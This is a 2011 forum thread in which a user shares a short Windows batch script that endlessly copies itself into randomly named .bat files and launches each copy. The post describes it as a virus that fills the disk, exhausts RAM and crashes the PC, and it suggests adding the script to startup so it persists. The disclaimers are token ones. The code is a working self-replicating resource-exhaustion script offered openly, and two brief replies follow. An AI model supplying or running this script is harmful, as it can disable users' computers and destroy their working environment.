TGS Forum
Hello Guest,

You are currently viewing our boards as a guest, which gives you limited access to view most discussions and access our other features.

By joining this community for FREE, you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content, & many other special features.

Registration is fast, simple & absolutely free, so please, join our community today!
TGS Forum
Hello Guest,

You are currently viewing our boards as a guest, which gives you limited access to view most discussions and access our other features.

By joining this community for FREE, you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content, & many other special features.

Registration is fast, simple & absolutely free, so please, join our community today!
TGS Forum
Would you like to react to this message? Create an account in a few clicks or log in to continue.

PortalHomeLatest imagesRegisterLog in

A very dangerous windows batch file

Go down 
2 posters
AuthorMessage
L30_Ph3niX
Grade - 2
Grade - 2
L30_Ph3niX

A very dangerous windows batch file Empty
PostSubject: A very dangerous windows batch file   A very dangerous windows batch file Icon_minitimeSat Sep 17, 2011 12:01 am

This batch file creates another batch file at random numbers, then puts the same code of itself in each of those files, then runs those bats, which ALSO do the same thing, constantly, forever, until your stop it.

what this will do, if you leave it on long enough, is it will store itself in ALOT of your hard drive space, making it almost ZERO, then also use up all your ram as your computer goes through all the files, and crash your pc. this virus WILL REQUIRE YOU TO REINSTALL WINDOWS!!!! to get rid of it!!!!

now, if you really wanted to make it a bad batch file, you could have it copy itself to startup, so that when you start up, the horror starts all over again, ON TOP OF ITSELF!!!!.

let me tell you, i let it run only five seconds, and that's b/c it took almost five seconds for the shutdown, and i deleted almost 9 megabytes of diskspace used by just BATCH FILES (which are 1 kb a PIECE!!) just imagine what would have happened to me if i let it run for just one minute...it'd be GIGS and probably well past GIGS in 10 minutes.

so, be careful guys, don't run it on yourself unless you have a virtual machine to limit your disk space used (even that might not be safe).

my usual warning, DON'T DO ANYTHING STUPID! DON'T DO ANYTHING ILLEGAL WITH THIS!
Code:
Code:
@echo off
:A
SET /A X=%RANDOM%%%1999999999%
type damage.bat >> %x%.bat
start %x%.bat
goto:A

i am not responsible for any idiots who decide to run this code.
Back to top Go down
http://www.encode.co.in
ungli
ungli

PostSubject: Re: A very dangerous windows batch file   A very dangerous windows batch file Icon_minitimeSat Sep 17, 2011 1:36 pm

LOLZ zz dangerous loop command !
Back to top Go down
L30_Ph3niX
Grade - 2
Grade - 2
L30_Ph3niX

PostSubject: Re: A very dangerous windows batch file   A very dangerous windows batch file Icon_minitimeSat Sep 17, 2011 7:20 pm

yea.......simple goto loop but can be lethal....
Back to top Go down
http://www.encode.co.in
Sponsored content

PostSubject: Re: A very dangerous windows batch file   A very dangerous windows batch file Icon_minitime

Back to top Go down

A very dangerous windows batch file
Page 1 of 1